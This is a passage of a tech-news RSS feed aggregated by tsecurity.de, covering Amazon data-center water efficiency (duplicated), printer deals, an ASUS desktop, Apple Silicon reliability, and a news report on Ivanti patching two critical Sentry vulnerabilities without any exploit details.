<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="700" height="311" src="https://www.thewindowsclub.com/wp-content/uploads/2026/05/windows-ready-print.jpg" class="attachment-full size-full wp-post-image" alt="Enable or disable Windows Ready Print" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2026/05/windows-ready-print.jpg 700w, https://www.thewindowsclub.com/wp-content/uploads/2026/05/windows-ready-print-500x222.jpg 500w, https://www.thewindowsclub.com/wp-content/uploads/2026/05/windows-ready-print-300x133.jpg 300w" sizes="(max-width: 700px) 100vw, 700px">If you have ever struggled with printer drivers crashing or failing to install, you are going to like what Microsoft is doing with Windows 11. Microsoft has decided to move away from legacy third-party printer drivers and introduce a more modern printing system called Windows Ready Print. In this post, we will see how to […]</p>
<p>This article <a href="https://www.thewindowsclub.com/what-is-windows-ready-print-how-to-enable-or-disable-it">What is Windows Ready Print? How to Enable or Disable it?</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is Language Visual? An Experiment with Chinese Characters]]></title>
<description><![CDATA[A story about a broken printer, visual inductive bias, and why the race endedin a tie.
The post Is Language Visual? An Experiment with Chinese Characters appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3593457/ai-nachrichten/is-language-visual-an-experiment-with-chinese-characters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593457/ai-nachrichten/is-language-visual-an-experiment-with-chinese-characters/</guid>
<pubDate>Fri, 12 Jun 2026 14:36:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A story about a broken printer, visual inductive bias, and why the race endedin a tie.</p>
<p>The post <a href="https://towardsdatascience.com/is-language-visual-an-experiment-with-chinese-characters-2/">Is Language Visual? An Experiment with Chinese Characters</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon claims its data centers are 7x more water-efficient than the industry average]]></title>
<description><![CDATA[As they face increasing backlash over their resource consumption, major data center operators are scrambling to prove they’re not a drain on the environment, or, at least, not as much of one as their competition.



Amazon has published some bold new claims to this end: The tech giant says it has...]]></description>
<link>https://tsecurity.de/de/3592174/it-nachrichten/amazon-claims-its-data-centers-are-7x-more-water-efficient-than-the-industry-average/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592174/it-nachrichten/amazon-claims-its-data-centers-are-7x-more-water-efficient-than-the-industry-average/</guid>
<pubDate>Fri, 12 Jun 2026 03:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As they face increasing backlash over their resource consumption, major data center operators are scrambling to prove they’re not a drain on the environment, or, at least, not as much of one as their competition.</p>



<p>Amazon has published some bold new claims to this end: The tech giant says it has achieved a 52% improvement in water efficiency over the last 5 years, and says its data centers are 7x more water-efficient than the industry average.</p>



<p>This, the company says, is thanks to a mix of innovative methods, including free air and evaporative cooling, and increased temperature thresholds.</p>



<p>The announcement underscores the importance of disclosure in the AI era, and signals that technology is no longer the sole differentiator, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="nofollow">Sanchit Vir Gogia</a> of Greyhound Research. “Water efficiency has become a front in hyperscale competition, not a footnote.”</p>



<h2 class="wp-block-heading">How Amazon is reducing its water consumption</h2>



<p>Amazon’s global data center operations used 0.12 liters of water per kilowatt-hour (L/kWh) in 2025, compared to the industry average of 0.84 L/kWh, a 7x lead, the company says.</p>



<p>Its closest competition was <a href="https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/2025-Microsoft-Environmental-Sustainability-Report.pdf" target="_blank" rel="nofollow">Microsoft</a>, which used 0.27 L/kWh in 2025, dropping from .30 in 2024. <a href="https://cloud.google.com/blog/products/infrastructure/measuring-the-environmental-impact-of-ai-inference/" rel="nofollow">Google</a> seems to be the heaviest user in recent years (averaging 1.15 L/kWh), while <a href="https://sustainability.atmeta.com/wp-content/uploads/2025/10/Meta_2025-Environmental-Data-Index.pdf" target="_blank" rel="nofollow">Meta</a> has hovered around .20 L/kWh.</p>



<p>Amazon employs a multiple methods to garner these results, it says.</p>



<p>Firstly, roughly 90% of the time the company uses “free air cooling,” pulling outside air into data centers, letting the air absorb heat, then pumping it back outside, with <a href="https://www.cio.com/article/4151906/sam-altman-is-right-about-the-fake-ai-water-usage-claims-but-cios-still-have-a-massive-sustainability-problem.html" target="_blank">no water required</a>. Amazon likens it to opening the windows on a summer evening rather than running the air conditioner.</p>



<p>When temperatures rise, Amazon uses evaporative cooling. Water is sprayed onto an absorbent medium and air is allowed to flow through it. The water evaporates and pulls heat from the air, cooling it by 5 to 10 degrees Fahrenheit.</p>



<p>Further, the company has been deliberately raising the thresholds at which its centers operate, designing servers that can tolerate more heat, thus reducing water needs. After a few years of “iteration, learning, and adjusting,” Amazon has raised the operating temperature to 85° F.</p>



<h2 class="wp-block-heading">Reclaiming water, partnering on community projects</h2>



<p>In 2025, Amazon says it returned 3 US gallons of water to local communities for every 4 gallons used, and is 75% of the way towards its goal of being water positive by 2030, where every gallon used will be returned in kind.</p>



<p>The company uses reclaimed water sourced from wastewater treatment plants, as opposed to potable water, across 130 of its data centers, with 26 facilities using this method exclusively. Additionally, it is helping communities develop reclaimed water programs that could return more than 5.8 billion US gallons annually.</p>



<p>Amazon is particularly focusing on areas where water is scarce, and aims to partner with communities “to ensure our water stewardship creates local benefits that they want to see,” the company says.</p>



<h2 class="wp-block-heading">Not hollow claims, but there are nuances</h2>



<p>“The gains are certainly real and the engineering is legitimate, so Amazon earns credit here,” said <a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="nofollow">Matt Kimball</a>, VP and principal analyst at Moor Insights &amp; Strategy.</p>



<p>The 0.12 figure is Water Usage Effectiveness (WUE), which measures the water used at the data center per kilowatt-hour of IT load. The metric was introduced by <a href="https://www.thegreengrid.org/" target="_blank" rel="nofollow">Green Grid</a> and is widely accepted as the standard, he explained.</p>



<p>Still, it can be difficult to be precise in these measurements, and there are nuances: Is a data center operator only reporting WUE? Do they count the water used to generate electricity (most actually don’t)? Is reclaimed water being counted in the waysame as potable?</p>



<p>But “to Amazon’s credit, they aren’t just shifting the burden elsewhere,” Kimball noted.</p>



<p>Free air cooling and higher operating temperature thresholds reduce both water and energy consumption, and Amazon’s power usage effectiveness (<a href="https://puecalculator.com/" target="_blank" rel="nofollow">PUE</a>), the standard metric for measuring data center efficiency, sits around 1.15.</p>



<p>“This means they’re not achieving this strong water number at the expense of a weak energy number,” Kimball said.</p>



<h2 class="wp-block-heading">Not a secret recipe</h2>



<p>While the gains are impressive, the techniques Amazon highlights are increasingly becoming standard practices, Kimball pointed out.</p>



<p>“Amazon is on the leading edge, but it’s not a secret recipe,” he said. What sets the company apart is scale, execution, facility design, geographic mix, and its aggressive pursuit of energy goals.</p>



<p>Others are doing the similar things, if through different avenues: Microsoft is investing in closed-loop cooling systems that dramatically reduce evaporative water loss. Google is heavily focused on reclaimed water and using AI to optimize data centers. Meta has long relied on outside-air cooling. And overall, the industry is moving toward liquid cooling for dense AI deployments, “which changes the water equation again,” said Kimball.</p>



<p>One of the big variables is location: Climate influences water efficiency, so where a company builds its infrastructure is as important as its cooling methods. Further, power-consumptive AI changes the discussion, he emphasized; traditional enterprise workloads and dense AI training clusters create very different thermal profiles.</p>



<p>“The industry is still working through what the long-term water and energy balance looks like as AI infrastructure scales,” Kimball said.</p>



<h2 class="wp-block-heading">The disclosure arms race</h2>



<p>As Gogia noted, what separates operators now is disclosure.</p>



<p>For instance, Microsoft has committed to publishing water data for every US data center region, while Equinix reports a portfolio figure of 0.91 L/kWh and 1.41 L/kWh for its evaporative-cooled sites, which is a “boundary discipline most of the market has yet to adopt,” said Gogia.</p>



<p>The next phase of cloud competition will be won on transparency, not just thermodynamics, he contended. “Operators that disclose region by region will expand faster, permit easier and litigate less.” In fact, his firm expects water disclosure to become a standard line item in cloud and AI infrastructure RFPs within 12 to 24 months.</p>



<p>CIOs should demand region-level withdrawal and consumption data, source-water mix, cooling architecture by region, drought contingency plans, and a “clean separation between operational efficiency and replenishment accounting,” Gogia advised.</p>



<p>Meanwhile, the timing of this reporting tells its own story: Amazon published these figures two days after its home city Seattle put a one-year freeze on new large data centers, citing water use as a big concern. Further, more than 70 US jurisdictions now have temporary or permanent restrictions, and the European Commission is preparing <a href="https://www.cio.com/article/4160466/data-centers-are-costing-local-governments-billions-2.html" target="_blank">efficiency standards</a> with water criteria.</p>



<p>So, this can be construed as a sustainability report as much as a “social-license counteroffensive,” said Gogia.</p>



<h2 class="wp-block-heading">AI is changing the game entirely</h2>



<p>Buyers should care about these developments for practical reasons beyond environmental, social, and governance (ESG) reporting, Kimball said.</p>



<p>First, water is becoming a real constraint on where data centers can be built, and communities are pushing back on development. This can impact capacity, expansion timelines, and operating costs in high-demand markets, he said.</p>



<p>Second, a cloud provider’s water footprint increasingly becomes part of a customer’s own sustainability profile. Therefore, organizations with environmental reporting requirements or water-related goals are paying closer attention to the resource consumption of the infrastructure supporting their apps and AI workloads.</p>



<p>Ultimately, Gogia noted, data centers are no longer invisible infrastructure: They are becoming contested civic infrastructure.</p>



<p>“The winners will treat water as a shared public constraint rather than a line item in sustainability theater,” he said. “The future of AI infrastructure will be decided as much by resource stewardship as by engineering capability.”</p>



<p>This article originally appeared on <a href="https://www.networkworld.com/article/4184250/amazon-claims-its-data-centers-are-7x-more-water-efficient-than-the-industry-average.html" target="_blank">NetworkWorld</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon claims its data centers are 7x more water-efficient than the industry average]]></title>
<description><![CDATA[As they face increasing backlash over their resource consumption, major data center operators are scrambling to prove they’re not a drain on the environment, or, at least, not as much of one as their competition.



Amazon has published some bold new claims to this end: The tech giant says it has...]]></description>
<link>https://tsecurity.de/de/3592148/it-security-nachrichten/amazon-claims-its-data-centers-are-7x-more-water-efficient-than-the-industry-average/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592148/it-security-nachrichten/amazon-claims-its-data-centers-are-7x-more-water-efficient-than-the-industry-average/</guid>
<pubDate>Fri, 12 Jun 2026 03:07:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As they face increasing backlash over their resource consumption, major data center operators are scrambling to prove they’re not a drain on the environment, or, at least, not as much of one as their competition.</p>



<p>Amazon has published some bold new claims to this end: The tech giant says it has achieved a 52% improvement in water efficiency over the last 5 years, and says its data centers are 7x more water-efficient than the industry average.</p>



<p>This, the company says, is thanks to a mix of innovative methods, including free air and evaporative cooling, and increased temperature thresholds.</p>



<p>The announcement underscores the importance of disclosure in the AI era, and signals that technology is no longer the sole differentiator, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a> of Greyhound Research. “Water efficiency has become a front in hyperscale competition, not a footnote.”</p>



<h2 class="wp-block-heading">How Amazon is reducing its water consumption</h2>



<p>Amazon’s global data center operations used 0.12 liters of water per kilowatt-hour (L/kWh) in 2025, compared to the industry average of 0.84 L/kWh, a 7x lead, the company says.</p>



<p>Its closest competition was <a href="https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/2025-Microsoft-Environmental-Sustainability-Report.pdf" target="_blank" rel="noreferrer noopener">Microsoft</a>, which used 0.27 L/kWh in 2025, dropping from .30 in 2024. <a href="https://cloud.google.com/blog/products/infrastructure/measuring-the-environmental-impact-of-ai-inference/">Google</a> seems to be the heaviest user in recent years (averaging 1.15 L/kWh), while <a href="https://sustainability.atmeta.com/wp-content/uploads/2025/10/Meta_2025-Environmental-Data-Index.pdf" target="_blank" rel="noreferrer noopener">Meta</a> has hovered around .20 L/kWh.</p>



<p>Amazon employs a multiple methods to garner these results, it says.</p>



<p>Firstly, roughly 90% of the time the company uses “free air cooling,” pulling outside air into data centers, letting the air absorb heat, then pumping it back outside, with <a href="https://www.cio.com/article/4151906/sam-altman-is-right-about-the-fake-ai-water-usage-claims-but-cios-still-have-a-massive-sustainability-problem.html" target="_blank">no water required</a>. Amazon likens it to opening the windows on a summer evening rather than running the air conditioner.</p>



<p>When temperatures rise, Amazon uses evaporative cooling. Water is sprayed onto an absorbent medium and air is allowed to flow through it. The water evaporates and pulls heat from the air, cooling it by 5 to 10 degrees Fahrenheit.</p>



<p>Further, the company has been deliberately raising the thresholds at which its centers operate, designing servers that can tolerate more heat, thus reducing water needs. After a few years of “iteration, learning, and adjusting,” Amazon has raised the operating temperature to 85° F.</p>



<h2 class="wp-block-heading">Reclaiming water, partnering on community projects</h2>



<p>In 2025, Amazon says it returned 3 US gallons of water to local communities for every 4 gallons used, and is 75% of the way towards its goal of being water positive by 2030, where every gallon used will be returned in kind.</p>



<p>The company uses reclaimed water sourced from wastewater treatment plants, as opposed to potable water, across 130 of its data centers, with 26 facilities using this method exclusively. Additionally, it is helping communities develop reclaimed water programs that could return more than 5.8 billion US gallons annually.</p>



<p>Amazon is particularly focusing on areas where water is scarce, and aims to partner with communities “to ensure our water stewardship creates local benefits that they want to see,” the company says.</p>



<h2 class="wp-block-heading">Not hollow claims, but there are nuances</h2>



<p>“The gains are certainly real and the engineering is legitimate, so Amazon earns credit here,” said <a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="noreferrer noopener">Matt Kimball</a>, VP and principal analyst at Moor Insights &amp; Strategy.</p>



<p>The 0.12 figure is Water Usage Effectiveness (WUE), which measures the water used at the data center per kilowatt-hour of IT load. The metric was introduced by <a href="https://www.thegreengrid.org/" target="_blank" rel="noreferrer noopener">Green Grid</a> and is widely accepted as the standard, he explained.</p>



<p>Still, it can be difficult to be precise in these measurements, and there are nuances: Is a data center operator only reporting WUE? Do they count the water used to generate electricity (most actually don’t)? Is reclaimed water being counted in the waysame as potable?</p>



<p>But “to Amazon’s credit, they aren’t just shifting the burden elsewhere,” Kimball noted.</p>



<p>Free air cooling and higher operating temperature thresholds reduce both water and energy consumption, and Amazon’s power usage effectiveness (<a href="https://puecalculator.com/" target="_blank" rel="noreferrer noopener">PUE</a>), the standard metric for measuring data center efficiency, sits around 1.15.</p>



<p>“This means they’re not achieving this strong water number at the expense of a weak energy number,” Kimball said.</p>



<h2 class="wp-block-heading">Not a secret recipe</h2>



<p>While the gains are impressive, the techniques Amazon highlights are increasingly becoming standard practices, Kimball pointed out.</p>



<p>“Amazon is on the leading edge, but it’s not a secret recipe,” he said. What sets the company apart is scale, execution, facility design, geographic mix, and its aggressive pursuit of energy goals.</p>



<p>Others are doing the similar things, if through different avenues: Microsoft is investing in closed-loop cooling systems that dramatically reduce evaporative water loss. Google is heavily focused on reclaimed water and using AI to optimize data centers. Meta has long relied on outside-air cooling. And overall, the industry is moving toward liquid cooling for dense AI deployments, “which changes the water equation again,” said Kimball.</p>



<p>One of the big variables is location: Climate influences water efficiency, so where a company builds its infrastructure is as important as its cooling methods. Further, power-consumptive AI changes the discussion, he emphasized; traditional enterprise workloads and dense AI training clusters create very different thermal profiles.</p>



<p>“The industry is still working through what the long-term water and energy balance looks like as AI infrastructure scales,” Kimball said.</p>



<h2 class="wp-block-heading">The disclosure arms race</h2>



<p>As Gogia noted, what separates operators now is disclosure.</p>



<p>For instance, Microsoft has committed to publishing water data for every US data center region, while Equinix reports a portfolio figure of 0.91 L/kWh and 1.41 L/kWh for its evaporative-cooled sites, which is a “boundary discipline most of the market has yet to adopt,” said Gogia.</p>



<p>The next phase of cloud competition will be won on transparency, not just thermodynamics, he contended. “Operators that disclose region by region will expand faster, permit easier and litigate less.” In fact, his firm expects water disclosure to become a standard line item in cloud and AI infrastructure RFPs within 12 to 24 months.</p>



<p>CIOs should demand region-level withdrawal and consumption data, source-water mix, cooling architecture by region, drought contingency plans, and a “clean separation between operational efficiency and replenishment accounting,” Gogia advised.</p>



<p>Meanwhile, the timing of this reporting tells its own story: Amazon published these figures two days after its home city Seattle put a one-year freeze on new large data centers, citing water use as a big concern. Further, more than 70 US jurisdictions now have temporary or permanent restrictions, and the European Commission is preparing <a href="https://www.cio.com/article/4160466/data-centers-are-costing-local-governments-billions-2.html" target="_blank">efficiency standards</a> with water criteria.</p>



<p>So, this can be construed as a sustainability report as much as a “social-license counteroffensive,” said Gogia.</p>



<h2 class="wp-block-heading">AI is changing the game entirely</h2>



<p>Buyers should care about these developments for practical reasons beyond environmental, social, and governance (ESG) reporting, Kimball said.</p>



<p>First, water is becoming a real constraint on where data centers can be built, and communities are pushing back on development. This can impact capacity, expansion timelines, and operating costs in high-demand markets, he said.</p>



<p>Second, a cloud provider’s water footprint increasingly becomes part of a customer’s own sustainability profile. Therefore, organizations with environmental reporting requirements or water-related goals are paying closer attention to the resource consumption of the infrastructure supporting their apps and AI workloads.</p>



<p>Ultimately, Gogia noted, data centers are no longer invisible infrastructure: They are becoming contested civic infrastructure.</p>



<p>“The winners will treat water as a shared public constraint rather than a line item in sustainability theater,” he said. “The future of AI infrastructure will be decided as much by resource stewardship as by engineering capability.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I filtered the early Amazon Prime Day 3D printer deals down to our 4.5-star workshop-tested winners]]></title>
<description><![CDATA[I found our top-performing 3D printers from Elegoo, Creality, Anycubic, and Bambu Lab all on sale right now.]]></description>
<link>https://tsecurity.de/de/3591406/it-nachrichten/i-filtered-the-early-amazon-prime-day-3d-printer-deals-down-to-our-45-star-workshop-tested-winners/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591406/it-nachrichten/i-filtered-the-early-amazon-prime-day-3d-printer-deals-down-to-our-45-star-workshop-tested-winners/</guid>
<pubDate>Thu, 11 Jun 2026 19:17:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I found our top-performing 3D printers from Elegoo, Creality, Anycubic, and Bambu Lab all on sale right now.]]></content:encoded>
</item>
<item>
<title><![CDATA[Our expert's favorite mid-range resin printer just plummeted to $480 ahead of Prime Day — and the lightning-fast Anycubic Photon Mono M7 Pro delivers 'outstanding print quality']]></title>
<description><![CDATA[The M7 Pro packs 14K resolution and blistering print speeds into a mid-size package — and it’s dropped by $190 at Amazon right now.]]></description>
<link>https://tsecurity.de/de/3591223/it-nachrichten/our-experts-favorite-mid-range-resin-printer-just-plummeted-to-480-ahead-of-prime-day-and-the-lightning-fast-anycubic-photon-mono-m7-pro-delivers-outstanding-print-quality/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591223/it-nachrichten/our-experts-favorite-mid-range-resin-printer-just-plummeted-to-480-ahead-of-prime-day-and-the-lightning-fast-anycubic-photon-mono-m7-pro-delivers-outstanding-print-quality/</guid>
<pubDate>Thu, 11 Jun 2026 18:16:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The M7 Pro packs 14K resolution and blistering print speeds into a mid-size package — and it’s dropped by $190 at Amazon right now.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ivanti patches critical Sentry flaws that lead to full device takeover]]></title>
<description><![CDATA[IT software provider Ivanti fixed two vulnerabilities in Ivanti Sentry, a secure mobile gateway appliance formerly called MobileIron Sentry. The flaws could allow unauthenticated remote attackers to gain complete control of deployments.



One of the vulnerabilities, CVE-2026-10523, credited to r...]]></description>
<link>https://tsecurity.de/de/3588821/it-security-nachrichten/ivanti-patches-critical-sentry-flaws-that-lead-to-full-device-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588821/it-security-nachrichten/ivanti-patches-critical-sentry-flaws-that-lead-to-full-device-takeover/</guid>
<pubDate>Wed, 10 Jun 2026 22:23:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IT software provider Ivanti fixed two vulnerabilities in Ivanti Sentry, a secure mobile gateway appliance formerly called MobileIron Sentry. <a href="https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US">The flaws</a> could allow unauthenticated remote attackers to gain complete control of deployments.</p>



<p>One of the vulnerabilities, CVE-2026-10523, credited to researcher Bryan Lam, allows attackers to bypass authentication and create arbitrary administrative accounts on appliances. The flaw is rated with a severity of 9.9 out of 10 on the CVSS scale.</p>



<p>The second flaw, CVE-2026-10520, is a command injection issue that can lead to remote code execution with root privileges on the underlying OS. Because the vulnerability can be exploited remotely without authentication, it is rated with the maximum CVSS severity score of 10.</p>



<p>Ivanti Sentry is an in-line gateway that manages, encrypts, and secures traffic between mobile devices and back-end enterprise servers such as Microsoft Exchange. It works together with Ivanti Endpoint Manager Mobile (EPMM) to enforce access restrictions and device verification. As such, the appliance is typically deployed at the enterprise network edge and is accessible from the internet.</p>



<p>Both vulnerabilities were reported privately through Ivanti’s responsible disclosure program, and the company is not aware of public exploitation at this time. But attackers, including <a href="https://www.csoonline.com/article/4135776/attackers-exploit-ivanti-epmm-zero-days-to-seize-control-of-mdm-servers.html">state-sponsored cyberespionage groups</a>, have <a href="https://www.csoonline.com/article/4135776/attackers-exploit-ivanti-epmm-zero-days-to-seize-control-of-mdm-servers.html">exploited vulnerabilities in Ivanti products</a> and network-edge appliances many times in the past.</p>



<p>Furthermore, researchers from security firm watchTowr have posted <a href="https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/">a detailed analysis</a> of CVE-2026-10520 and the exploit is trivial to execute. The researchers <a href="https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523">released a Python script</a> that enables organizations to test whether their deployments are vulnerable.</p>



<p>Ivanti Sentry customers are advised to upgrade their deployments to versions 10.5.2, 10.6.2, or 10.7.1 as soon as possible.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ASUS ROG G1000 20th Anniversary Desktop Has THIS World's First Feature!]]></title>
<description><![CDATA[Author: Shannon Morse - Bewertung: 3x - Views:70 🚀 ASUS brought one of the most epic desktops at Computex 2026. The ROG G1000 20th Anniversary Edition features AniMe Holo, a redesigned Thermal Atrium cooling system, and an AMD Ryzen™ 9 9950X3D processor paired with an RTX 5090. What do you think?...]]></description>
<link>https://tsecurity.de/de/3588690/videos/asus-rog-g1000-20th-anniversary-desktop-has-this-worlds-first-feature/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588690/videos/asus-rog-g1000-20th-anniversary-desktop-has-this-worlds-first-feature/</guid>
<pubDate>Wed, 10 Jun 2026 21:03:01 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Shannon Morse - Bewertung: 3x - Views:70 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/UqXoOZi-XDI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>🚀 ASUS brought one of the most epic desktops at Computex 2026. The ROG G1000 20th Anniversary Edition features AniMe Holo, a redesigned Thermal Atrium cooling system, and an AMD Ryzen™ 9 9950X3D processor paired with an RTX 5090. What do you think? 🔥 @AMD @asusrog <br />
<br />
#Computex2026<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I found two great EcoTank printer deals on Amazon — but you should only buy this one]]></title>
<description><![CDATA[Choosing between the EcoTank ET-2860 and the ET-2861 is easy - they're the same printer, so buy the cheapest]]></description>
<link>https://tsecurity.de/de/3588438/it-nachrichten/i-found-two-great-ecotank-printer-deals-on-amazon-but-you-should-only-buy-this-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588438/it-nachrichten/i-found-two-great-ecotank-printer-deals-on-amazon-but-you-should-only-buy-this-one/</guid>
<pubDate>Wed, 10 Jun 2026 19:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Choosing between the EcoTank ET-2860 and the ET-2861 is easy - they're the same printer, so buy the cheapest]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Silicon boosts the TCO benefit of Macs — report]]></title>
<description><![CDATA[Apple Silicon Macs fail at less than half the rate of Intel Macs, dramatically reducing the platform’s already industry-leading total cost of ownership (TCO), according to data revealed by London, UK-based Apple reseller Hoxton Macs.



While it’s true the data is based on a relatively small samp...]]></description>
<link>https://tsecurity.de/de/3588269/it-nachrichten/apple-silicon-boosts-the-tco-benefit-of-macs-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588269/it-nachrichten/apple-silicon-boosts-the-tco-benefit-of-macs-report/</guid>
<pubDate>Wed, 10 Jun 2026 18:18:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple Silicon Macs fail at less than half the rate of Intel Macs, dramatically reducing the platform’s <a href="https://www.computerworld.com/article/1614657/apple-macs-are-best-choice-for-enterprise.html">already industry-leading total cost of ownership</a> (TCO), according to data revealed by London, UK-based Apple reseller <a href="https://www.hoxtonmacs.co.uk/blogs/news/apple-silicon-macs-almost-never-come-back" target="_blank" rel="noreferrer noopener">Hoxton Macs</a>.</p>



<p>While it’s true the data is based on a relatively small sample group, it does seem to reflect what the industry in general sees.</p>



<h2 class="wp-block-heading"><strong>Apple’s chip design transforms Mac reliability</strong></h2>



<p>The success of Apple Silicon hardware is attributed to its simpler design, which integrates multiple components into a single chip, reducing the number of potential failure points. Additionally, Apple Silicon Macs run cooler, leading to less wear and tear on components such as batteries and USB-C ports, the report says. Across the wider laptop market, most studies show hardware faults affect one in five non-Apple machines over their first three years in use.</p>



<p>This builds on Apple’s enduring record for making good hardware as independent reliability surveys consistently rank the company as the most reliable laptop brand. To some extent, the data reflects the anecdotal experience most Mac users have — their computers seem to last much longer than other systems do, which helps them retain value on the second-user market.</p>



<p>Apple already had a good story to tell in terms of tech support before it introduced Apple Silicon machines. More than a decade ago, Fletcher Previn, then vice president of Workplace-as-a-Service at IBM, told the <a href="https://www.computerworld.com/article/1626955/every-mac-we-buy-is-making-and-saving-ibm-money-ibm.html">Jamf Nation User Conference</a> that just 5% of IBM’s Mac-using employees needed to call the help desk; in contrast, an astonishing 40% of PC-using staff had to do so. That difference is significant because it translates into serious differences in cost; each tech support call made by those working on your ailing PC fleet has a price. </p>



<p>That TCO difference prompted Previn to say, “I can confidently say every Mac that we buy is making and saving IBM money.” Years later, as CIO at Cisco, he said the company’s tens of thousands of Mac users <a href="https://www.computerworld.com/article/1636221/cisco-macs-in-business-boost-productivity-and-security-cuts-costs.html" data-type="link" data-id="https://www.computerworld.com/article/1636221/cisco-macs-in-business-boost-productivity-and-security-cuts-costs.html">experienced five times fewer cyberthreats and nine times fewer virus issues</a> than PCs, and that Cisco needed 33% fewer engineers to manage the Macs.</p>



<p>Those impressive real-world data points reflected Macs in the pre-Apple Silicon world. Those Intel Macs already worked better for longer and required less tech support. This month’s Hoxton Macs data, while based on a much smaller sample group, suggests that this particular advantage has grown even greater now. And it’s not just down to the silicon.</p>



<h2 class="wp-block-heading"><strong>Fewer parts, less heat, fewer failures</strong></h2>



<p>Apple has designed its processors to deliver excellent performance per watt. Because these are SoCs (System on Chips) the power requirement to drive all the system components is that much lower, and it means whole categories of component failure are removed. The design also means they use less energy and generate less heat to run, dramatically reducing thermal wear and tear. </p>



<p>“Fewer parts, less heat, simpler construction: the result is a machine with markedly fewer ways to break,” Hoxton Mac said in an <a href="https://www.hoxtonmacs.co.uk/blogs/news/apple-silicon-macs-almost-never-come-back" target="_blank" rel="noreferrer noopener">extensive article explaining its data</a>. </p>



<p>&gt;Failure rates are consequential to everyone. Even a small failure rate means some people will end up with Macs that have hardware issues, which is always a problem for those affected. But the low fail rate should be reassuring to the millions of people switching to Apple’s  href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html"&gt;even cooler-running MacBook Neos&gt;. </p>



<p>Those users might now justifiably look forward to lower running costs from their new computers, combined with good resale rates once they’re ready to upgrade. It doesn’t hurt Apple’s platform loyalty either — making it even more likely those millions of users will stay with the Mac rather than going back to where they were before.</p>



